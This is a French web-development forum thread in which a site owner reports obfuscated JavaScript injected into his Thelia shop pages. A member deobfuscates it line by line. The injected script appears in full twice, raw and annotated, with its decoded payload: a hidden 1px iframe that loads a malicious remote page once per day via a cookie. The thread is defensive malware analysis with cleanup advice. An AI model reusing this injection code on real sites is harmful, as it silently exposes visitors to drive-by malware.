IdentifiantMot de passe
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Sécurité Discussion :

Javascript bizarre sur mon serveur web


Sujet :

Sécurité

  1. 11/06/2013, 20h24 #1
    razorlok
    razorlok est déconnecté
    Membre régulier Avatar de razorlok
    Profil pro
    Inscrit en
    Novembre 2006
    Messages
    211
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Novembre 2006
    Messages : 211
    Points : 111
    Points
    111
    Par défaut Javascript bizarre sur mon serveur web
    Bonjour à tous,

    j'ai installé un site Thelia pour un ami et cet après-midi, il m'a appelé pour me dire qu'il y avait du code bizarre sur la page d'accueil du site.
    En effet, dans la quasi-totalité des pages du template, je trouve un code javascript qui m'est inconnu. En voici un exemple :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    <!--0c0896--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          bv=(5-3-1);aq="0"+"x";sp="spli"+"t";ff=String.fromCharCode;w=window;z="dy";try{document["\x62o"+z]++}catch(d21vd12v){vzs=false;v=123;try{document;}catch(wb){vzs=2;}if(!vzs)e=w["eval"];if(1){f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,65,60,6c,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,65,60,6c,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5b,58,6d,60,5b,64,5e,6c,6b,60,5c,69,69,5c,71,25,5a,66,64,26,40,1d,49,26,5a,65,6b,25,67,5f,67,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,65,60,6c,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,65,60,6c,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,65,60,6c,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,65,60,6c,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");}w=f;s=[];for(i=2-2;-i+1324!=0;i+=1){j=i;if((0x19==031))if(e)s+=ff(e(aq+(w[j]))+0xa-bv);}za=e;za(s)}</script><!--/0c0896-->
    Je vois que la date de modification de ces fichiers html est fixée à aujourd'hui. J'en déduis donc qu'il s'agit d'un type d'infection...

    Quelqu'un a-t il une idée de ce que c'est ou d'une méthode de suppression ?
    Wear some golf shoes, otherwise we'll never get out of this place alive.
    Répondre avec citation Répondre avec citation   0  0
  2. 13/06/2013, 11h05 #2
    fredoche
    fredoche est déconnecté
    Membre extrêmement actif
    Profil pro
    Inscrit en
    Décembre 2003
    Messages
    1 616
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2003
    Messages : 1 616
    Points : 3 965
    Points
    3 965
    Par défaut
    Ton site est évidemment hacké

    il faut avec un éditeur texte rechercher cette chaine de caractère et la supprimer de tous tes scripts/pages, ou bien réinstaller ce site thelia à partir d'une source propre (backup ou code source original)

    Quand à ce qu'il fait, je ne sais pas encore, mais le mécanisme m'intéresse. Je vais essayer d'analyser ça si j'ai un peu de temps.

    pense à changer tous tes passwords et si tu peux les logins aussi ,avant de procéder au nettoyage.
    si cela se reproduit, il faudra voir avec l'hébergeur qui peut lui même être hacké.
    Émotion
    Infantilisation
    Culpabilisation
    Christophe Alévèque - 18 Mars 2021
    Répondre avec citation Répondre avec citation   0  0
  3. 13/06/2013, 13h05 #3
    fredoche
    fredoche est déconnecté
    Membre extrêmement actif
    Profil pro
    Inscrit en
    Décembre 2003
    Messages
    1 616
    Détails du profil
    Informations personnelles :
    Localisation : France

    Informations forums :
    Inscription : Décembre 2003
    Messages : 1 616
    Points : 3 965
    Points
    3 965
    Par défaut
    Voici le script analysé en détail. C'est un exercice super intéressant

    je développerai après le déjeuner sur ce qu'il contient et la fonction créée

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
     <!--0c0896-->
 <script type="text/javascript" language="javascript" >
 bv=(5-3-1); //bv=1
 aq="0"+"x"; //aq="0x" préfixe pour les nombres hexadécimaux en javascript
 sp="spli"+"t"; // sp pour la fonction split
 ff=String.fromCharCode; // ff pour la fonction permettant d'afficher un caractère depuis son code hexadécimal - bizarrement cette commande n'est pas offusquée
 w=window; // w pointe sur l'objet window
 z="dy"; // fin du mot body, voir ligne suivante
 try
	{document["\x62o"+z]++} 
	/* va être remplacé par {document["body"]++} --> renvoie :"Exception: Value not an object." sur firefox. Visblement cela sert à tester si l'on est dans un navigateur
	auquel cas une exception sera renvoyée et on entrera dans le catch*/
 catch(d21vd12v)
	{
	vzs=false;
	v=123;
	try
		{document;} // second test sur l'objet document, cette fois seul, auquel cas vzs conserve la valeur booléenne "false"
	catch(wb)
		{vzs=2;} // si le script n'est pas dans le contexte d'un navigateur, vzs prend une valeur qui sera évaluée à true
		
		
	if(!vzs) // nous sommes dans un navigateur
		{
		e=w["eval"]; //on affecte à e la fonction window.eval
		}
	if(1) // toujours vrai (true)
		{
		f="17,5d,6c,65,5a,6b,60,66,65,17,71,71,71,5d,5d,5d,1f,20,17,72,4,1,17,6d,58,69,17,65,60,6c,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,69,5c,58,6b,5c,3c,63,5c,64,5c,65,6b,1f,1e,60,5d,69,58,64,5c,1e,20,32,4,1,4,1,17,65,60,6c,25,6a,69,5a,17,34,17,1e,5f,6b,6b,67,31,26,26,5b,58,6d,60,5b,64,5e,6c,6b,60,5c,69,69,5c,71,25,5a,66,64,26,40,1d,49,26,5a,65,6b,25,67,5f,67,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,67,66,6a,60,6b,60,66,65,17,34,17,1e,58,59,6a,66,63,6c,6b,5c,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,59,66,69,5b,5c,69,17,34,17,1e,27,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,5f,5c,60,5e,5f,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,6e,60,5b,6b,5f,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,63,5c,5d,6b,17,34,17,1e,28,67,6f,1e,32,4,1,17,65,60,6c,25,6a,6b,70,63,5c,25,6b,66,67,17,34,17,1e,28,67,6f,1e,32,4,1,4,1,17,60,5d,17,1f,18,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,65,60,6c,1e,20,20,17,72,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,6e,69,60,6b,5c,1f,1e,33,5b,60,6d,17,60,5b,34,53,1e,65,60,6c,53,1e,35,33,26,5b,60,6d,35,1e,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5e,5c,6b,3c,63,5c,64,5c,65,6b,39,70,40,5b,1f,1e,65,60,6c,1e,20,25,58,67,67,5c,65,5b,3a,5f,60,63,5b,1f,65,60,6c,20,32,4,1,17,74,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,4a,5c,6b,3a,66,66,62,60,5c,1f,5a,66,66,62,60,5c,45,58,64,5c,23,5a,66,66,62,60,5c,4d,58,63,6c,5c,23,65,3b,58,70,6a,23,67,58,6b,5f,20,17,72,4,1,17,6d,58,69,17,6b,66,5b,58,70,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,6d,58,69,17,5c,6f,67,60,69,5c,17,34,17,65,5c,6e,17,3b,58,6b,5c,1f,20,32,4,1,17,60,5d,17,1f,65,3b,58,70,6a,34,34,65,6c,63,63,17,73,73,17,65,3b,58,70,6a,34,34,27,20,17,65,3b,58,70,6a,34,28,32,4,1,17,5c,6f,67,60,69,5c,25,6a,5c,6b,4b,60,64,5c,1f,6b,66,5b,58,70,25,5e,5c,6b,4b,60,64,5c,1f,20,17,22,17,2a,2d,27,27,27,27,27,21,29,2b,21,65,3b,58,70,6a,20,32,4,1,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,17,34,17,5a,66,66,62,60,5c,45,58,64,5c,22,19,34,19,22,5c,6a,5a,58,67,5c,1f,5a,66,66,62,60,5c,4d,58,63,6c,5c,20,4,1,17,22,17,19,32,5c,6f,67,60,69,5c,6a,34,19,17,22,17,5c,6f,67,60,69,5c,25,6b,66,3e,44,4b,4a,6b,69,60,65,5e,1f,20,17,22,17,1f,1f,67,58,6b,5f,20,17,36,17,19,32,17,67,58,6b,5f,34,19,17,22,17,67,58,6b,5f,17,31,17,19,19,20,32,4,1,74,4,1,5d,6c,65,5a,6b,60,66,65,17,3e,5c,6b,3a,66,66,62,60,5c,1f,17,65,58,64,5c,17,20,17,72,4,1,17,6d,58,69,17,6a,6b,58,69,6b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,65,58,64,5c,17,22,17,19,34,19,17,20,32,4,1,17,6d,58,69,17,63,5c,65,17,34,17,6a,6b,58,69,6b,17,22,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,22,17,28,32,4,1,17,60,5d,17,1f,17,1f,17,18,6a,6b,58,69,6b,17,20,17,1d,1d,4,1,17,1f,17,65,58,64,5c,17,18,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,27,23,17,65,58,64,5c,25,63,5c,65,5e,6b,5f,17,20,17,20,17,20,4,1,17,72,4,1,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,74,4,1,17,60,5d,17,1f,17,6a,6b,58,69,6b,17,34,34,17,24,28,17,20,17,69,5c,6b,6c,69,65,17,65,6c,63,63,32,4,1,17,6d,58,69,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,60,65,5b,5c,6f,46,5d,1f,17,19,32,19,23,17,63,5c,65,17,20,32,4,1,17,60,5d,17,1f,17,5c,65,5b,17,34,34,17,24,28,17,20,17,5c,65,5b,17,34,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,63,5c,65,5e,6b,5f,32,4,1,17,69,5c,6b,6c,69,65,17,6c,65,5c,6a,5a,58,67,5c,1f,17,5b,66,5a,6c,64,5c,65,6b,25,5a,66,66,62,60,5c,25,6a,6c,59,6a,6b,69,60,65,5e,1f,17,63,5c,65,23,17,5c,65,5b,17,20,17,20,32,4,1,74,4,1,60,5d,17,1f,65,58,6d,60,5e,58,6b,66,69,25,5a,66,66,62,60,5c,3c,65,58,59,63,5c,5b,20,4,1,72,4,1,60,5d,1f,3e,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,20,34,34,2c,2c,20,72,74,5c,63,6a,5c,72,4a,5c,6b,3a,66,66,62,60,5c,1f,1e,6d,60,6a,60,6b,5c,5b,56,6c,68,1e,23,17,1e,2c,2c,1e,23,17,1e,28,1e,23,17,1e,26,1e,20,32,4,1,4,1,71,71,71,5d,5d,5d,1f,20,32,4,1,74,4,1,74,4,1"[sp](",");
		/* ici on construit un tableau f sur la base d'une syntaxe du type string.split (séparateur), avec "," comme séparateur
		la syntaxe utilisée est plutôt "a,b,c"["split"](",") <=> string["split"](séparateur)
		le résultat est un tableau f de 1324 lignes, contenant une série de caractères hexadécimaux sans le préfixe hexadécimal (0x)
		*/
		
		w=f; // on affecte f à la variable w
		s=[]; // on crée un tableau vide s
		for(i=2-2;-i+1324!=0;i+=1) //on peut traduire ici : for (i=0; i<1324;i++)
			{
			j=i;
			if((0x19==031)) /*0x19 est une notation hexa, 031 est la notation octale en javascript. Ces 2 chiffres valent 25. 
							Visiblement cela sert à tester si notation hexa et octal sont supportées par le navigateur */
				{
				if(e) /*rappel : e vaut window.eval, plus précisément window["eval"] 
				c'est ici certainement un test supplémentaire pour vérifier la validité et l'accessibilité de window.eval dans le contexte d'exécution du script */
					{
					s+=ff(e(aq+(w[j]))+0xa-bv);
					/*
					rappel : 
					- ff équivaut à String.fromCharCode
					- e équivaut à window.eval
					- aq est le préfixe hexadécimal
					- bv = 1
					
					les codes de caractères fournis par le tableau précédent sont aussi offusqués de manière assez simple, avec un décalage de code hexa qui doit correspondre à
					codehexareel = codehexatableau + +0xa-1
					
					nous avons ci dessus la procédure complète de décodage de la chaine de caractère
					voici cette chaine :
					*** script malveillant ***
					function zzzfff() {
					 var niu = document.createElement('iframe');

					 niu.src = 'http://davidmgutierrez.com/I&R/cnt.php';
					 niu.style.position = 'absolute';
					 niu.style.border = '0';
					 niu.style.height = '1px';
					 niu.style.width = '1px';
					 niu.style.left = '1px';
					 niu.style.top = '1px';

					 if (!document.getElementById('niu')) {
					 document.write('<div id=\'niu\'></div>');
					 document.getElementById('niu').appendChild(niu);
					 }
					}
					function SetCookie(cookieName,cookieValue,nDays,path) {
					 var today = new Date();
					 var expire = new Date();
					 if (nDays==null || nDays==0) nDays=1;
					 expire.setTime(today.getTime() + 3600000*24*nDays);
					 document.cookie = cookieName+"="+escape(cookieValue)
					 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
					}
					function GetCookie( name ) {
					 var start = document.cookie.indexOf( name + "=" );
					 var len = start + name.length + 1;
					 if ( ( !start ) &&
					 ( name != document.cookie.substring( 0, name.length ) ) )
					 {
					 return null;
					 }
					 if ( start == -1 ) return null;
					 var end = document.cookie.indexOf( ";", len );
					 if ( end == -1 ) end = document.cookie.length;
					 return unescape( document.cookie.substring( len, end ) );
					}
					if (navigator.cookieEnabled)
					{
					if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

					zzzfff();
					}
					}
					*** fin du script malveillant ***
					*/
					}
				}
			}
			za=e; // za reprend la fonction e, donc window.eval
			za(s) // la chaine ci dessus est exécutée, on peut essayer d'évaluer ce qu'elle fait exactement
					
		}
</script><!--/0c0896-->
    A savoir que quand je sauvegarde ce script sur mon pc, MSE me le vire aussi vite, donc il reconnait le malware.
    La page pointée est identifiée comme malveillante par firefox

    le gars qui te hacke laisse visiblement son nom, à moins qu'il ne soit lui-même hacké.
    ...

    la fonction malveillante elle-même :

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    function zzzfff() {
					 var niu = document.createElement('iframe');

					 niu.src = 'http://davidmgutierrez.com/I&R/cnt.php';
					 niu.style.position = 'absolute';
					 niu.style.border = '0';
					 niu.style.height = '1px';
					 niu.style.width = '1px';
					 niu.style.left = '1px';
					 niu.style.top = '1px';

					 if (!document.getElementById('niu')) {
					 document.write('<div id=\'niu\'></div>');
					 document.getElementById('niu').appendChild(niu);
					 }
					}
					function SetCookie(cookieName,cookieValue,nDays,path) {
					 var today = new Date();
					 var expire = new Date();
					 if (nDays==null || nDays==0) nDays=1;
					 expire.setTime(today.getTime() + 3600000*24*nDays);
					 document.cookie = cookieName+"="+escape(cookieValue)
					 + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
					}
					function GetCookie( name ) {
					 var start = document.cookie.indexOf( name + "=" );
					 var len = start + name.length + 1;
					 if ( ( !start ) &&
					 ( name != document.cookie.substring( 0, name.length ) ) )
					 {
					 return null;
					 }
					 if ( start == -1 ) return null;
					 var end = document.cookie.indexOf( ";", len );
					 if ( end == -1 ) end = document.cookie.length;
					 return unescape( document.cookie.substring( len, end ) );
					}
					if (navigator.cookieEnabled)
					{
					if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/');

					zzzfff();
					}
					}
    Émotion
    Infantilisation
    Culpabilisation
    Christophe Alévèque - 18 Mars 2021
    Répondre avec citation Répondre avec citation   0  0
  4. 30/06/2013, 03h36 #4
    Ecomagnet
    Ecomagnet est déconnecté
    Membre à l'essai
    Homme Profil pro
    Gérant d'entreprise
    Inscrit en
    Octobre 2008
    Messages
    17
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France

    Informations professionnelles :
    Activité : Gérant d'entreprise

    Informations forums :
    Inscription : Octobre 2008
    Messages : 17
    Points : 12
    Points
    12
    Par défaut
    J'ai eu un problème similaire et à chaque fois que je réinstallai les sites, cela revenais et mes sauvegardes étaient infectées aussi.
    Cela peut venir d'un virus sur ton PC, moi pour résoudre le problème, j'ai pris un petit PC portable sur lequel j'ai installé Linux pour accéder à mes FTP et corriger toutes les pages.
    J'avais réussi à faire un petit code qui changeait tous les scripts malveillants mais j'avais de la chance, les scripts étaient facilement localisables.
    Un conseil, tant que ton PC est infecté, n'utilises pas filezilla et change tout tes mots de passe FTP et admin de tes sites.

    Bon courage.
    Répondre avec citation Répondre avec citation   0  0
ActualitésFAQs WebTutoriels WebSources WebLivres WebOutils Web
« Discussion précédente | Discussion suivante »

Discussions similaires

  1. Connexion web impossible depuis internet sur mon serveur
    Par Mindiell dans le forum Réseau
    Réponses: 8
    Dernier message: 10/07/2009, 11h39
  2. Tentatives bizarres sur mon serveur ?
    Par aliens dans le forum Sécurité
    Réponses: 2
    Dernier message: 13/11/2007, 13h05
  3. Ligne de commande php pour exécuter un script php basé sur mon serveur web
    Par bdgtat dans le forum EDI, CMS, Outils, Scripts et API
    Réponses: 5
    Dernier message: 13/07/2007, 08h53
  4. [MySQL] comment je peux faire un service web sur mon serveur ?
    Par jadoo dans le forum PHP & Base de données
    Réponses: 3
    Dernier message: 17/05/2006, 14h48
  5. Visibilité de mon serveur Web sur le net prise 2
    Par il_a_ri dans le forum IIS
    Réponses: 7
    Dernier message: 03/12/2004, 11h26

Partager

Partager
  • Envoyer la discussion sur Viadeo
  • Envoyer la discussion sur Twitter
  • Envoyer la discussion sur Google
  • Envoyer la discussion sur Facebook
  • Envoyer la discussion sur Digg
  • Envoyer la discussion sur Delicious
  • Envoyer la discussion sur MySpace
  • Envoyer la discussion sur Yahoo